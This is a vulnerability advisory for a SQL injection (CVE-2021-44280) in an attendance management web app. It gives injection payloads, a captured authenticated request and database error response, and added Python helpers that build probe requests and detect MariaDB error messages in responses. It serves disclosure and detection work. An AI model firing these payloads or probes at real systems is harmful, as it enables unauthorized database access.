CVE-2021-44280
Vendor
Description:
The status parameter of pageViewMembers.php in Attendance Management System 1.0 is vulnerable to SQL injection by an authenticated user: the page sits under /admin/ and the captured request below carries a valid application session cookie. The payload 011011100111010100110001001100010111001101100101011000110111010101110010001100010111010001111001%27or%271=1 was submitted in the status parameter, and the application returned a database error message. The captured request below uses a second, numeric payload (164054629 or 4022=04022) and receives a MariaDB syntax error in the page body while the HTTP status is still 200 OK, so the fault has to be detected from the response body rather than the status code. An authenticated attacker can use this injection point to carry out further attacks against the database. STATUS: Risk LOW - MEDIUM
SQL Request:
GET /Attendance-Management-System/admin/pageViewMembers.php?status=164054629%20or%204022%3d04022 HTTP/1.1
Host: 192.168.10.22
Cookie: Attendance_Management_System_rememberMe=c0e024d9200b5705bc4804722636378a; Attendance_Management_System=e8oqed0r866tojucn8g7ikd35c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.10.22/Attendance-Management-System/admin/pageHome.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

SQL Response:
HTTP/1.1 200 OK
Date: Mon, 06 Dec 2021 11:49:03 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13970
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html cla
...[SNIP]...
<script>
$j(function(){
show_notification({"message":"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1<pre class=\"ltr\">
...[SNIP]...
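The Python helpers below reproduce the check offline: they decode the advisory's binary-plus-percent-encoded payload (the 8-bit groups spell nu11secur1ty and the %27or%271=1 suffix is a quote break, 'or'1=1), pull the injected value out of the captured request line, build an equivalent probe request, and scan a response body for the MariaDB error fingerprint that the capture shows. This is an added example, not code from the advisory or from the Attendance Management System project; the host, path, parameter and cookie names are taken from the capture above, the two response bodies are constructed for the demonstration, and the fingerprint list is an assumption that covers only the database engine seen here.

```python
"""Offline reproduction helpers for the CVE-2021-44280 finding.

Added example; this is not code from the advisory or from the Attendance
Management System project. Host, path and parameter names come from the
advisory's captured request. The response bodies used here are constructed
to mirror the captured one, not fetched from a live target.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, quote, unquote, urlsplit

HOST = "192.168.10.22"
PATH = "/Attendance-Management-System/admin/pageViewMembers.php"
PARAM = "status"

# Database error fingerprints (assumed list). Only MariaDB/MySQL phrases are
# included because that is what the advisory's response shows; add other
# engines' messages when probing a different target.
SQL_ERROR_PATTERNS = [
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"corresponds to your (?:MariaDB|MySQL) server version", re.I),
]


def decode_binary_payload(payload: str) -> str:
    """Return the text the server saw for the advisory's description payload.

    The payload is a run of 8-bit binary groups (one ASCII character each)
    followed by percent-encoded SQL, where %27 is a single quote.
    """
    m = re.match(r"(?:[01]{8})+", payload)
    if not m:
        raise ValueError("payload does not start with 8-bit binary groups")
    bits, rest = m.group(0), payload[m.end():]
    text = "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))
    return text + unquote(rest)


def injected_value(request_line: str, param: str = PARAM) -> Optional[str]:
    """Extract and percent-decode `param` from a captured HTTP request line."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        return None
    values = parse_qs(urlsplit(target).query).get(param)
    return values[0] if values else None


def build_probe(value: str, cookie: str, host: str = HOST, path: str = PATH,
                param: str = PARAM) -> str:
    """Build a raw GET request carrying `value` in the injectable parameter.

    quote(..., safe="") encodes spaces and '=' so the value reaches the
    server unchanged; the session cookie is needed because the page is
    only reachable from inside the admin panel.
    """
    query = f"{param}={quote(value, safe='')}"
    return (
        f"GET {path}?{query} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        f"Connection: close\r\n\r\n"
    )


def sql_error_in(body: str) -> Optional[str]:
    """Return the matched error fingerprint, or None if the body looks clean.

    The advisory's response is HTTP 200 with the error embedded in a
    show_notification() call, so the check must read the body; a
    status-code check alone would report the page as healthy.
    """
    for pattern in SQL_ERROR_PATTERNS:
        m = pattern.search(body)
        if m:
            return m.group(0)
    return None


# Constructed response bodies, shaped like the advisory's truncated capture.
ERROR_BODY = (
    '<script>$j(function(){show_notification({"message":"You have an error '
    'in your SQL syntax; check the manual that corresponds to your MariaDB '
    'server version for the right syntax to use near \'\' at line 1<pre '
    'class=\\"ltr\\">'
)
CLEAN_BODY = "<!DOCTYPE html><html><body><table id='members'></table></body></html>"

if __name__ == "__main__":
    captured = ("GET /Attendance-Management-System/admin/pageViewMembers.php"
                "?status=164054629%20or%204022%3d04022 HTTP/1.1")
    print(injected_value(captured))
    print(sql_error_in(ERROR_BODY), sql_error_in(CLEAN_BODY))
```

Run it against a live instance by sending the output of build_probe() over a socket and passing the body to sql_error_in(); for a second opinion, send a baseline request with a benign status value and confirm the fingerprint is absent there, which separates the injection from a page that is simply broken.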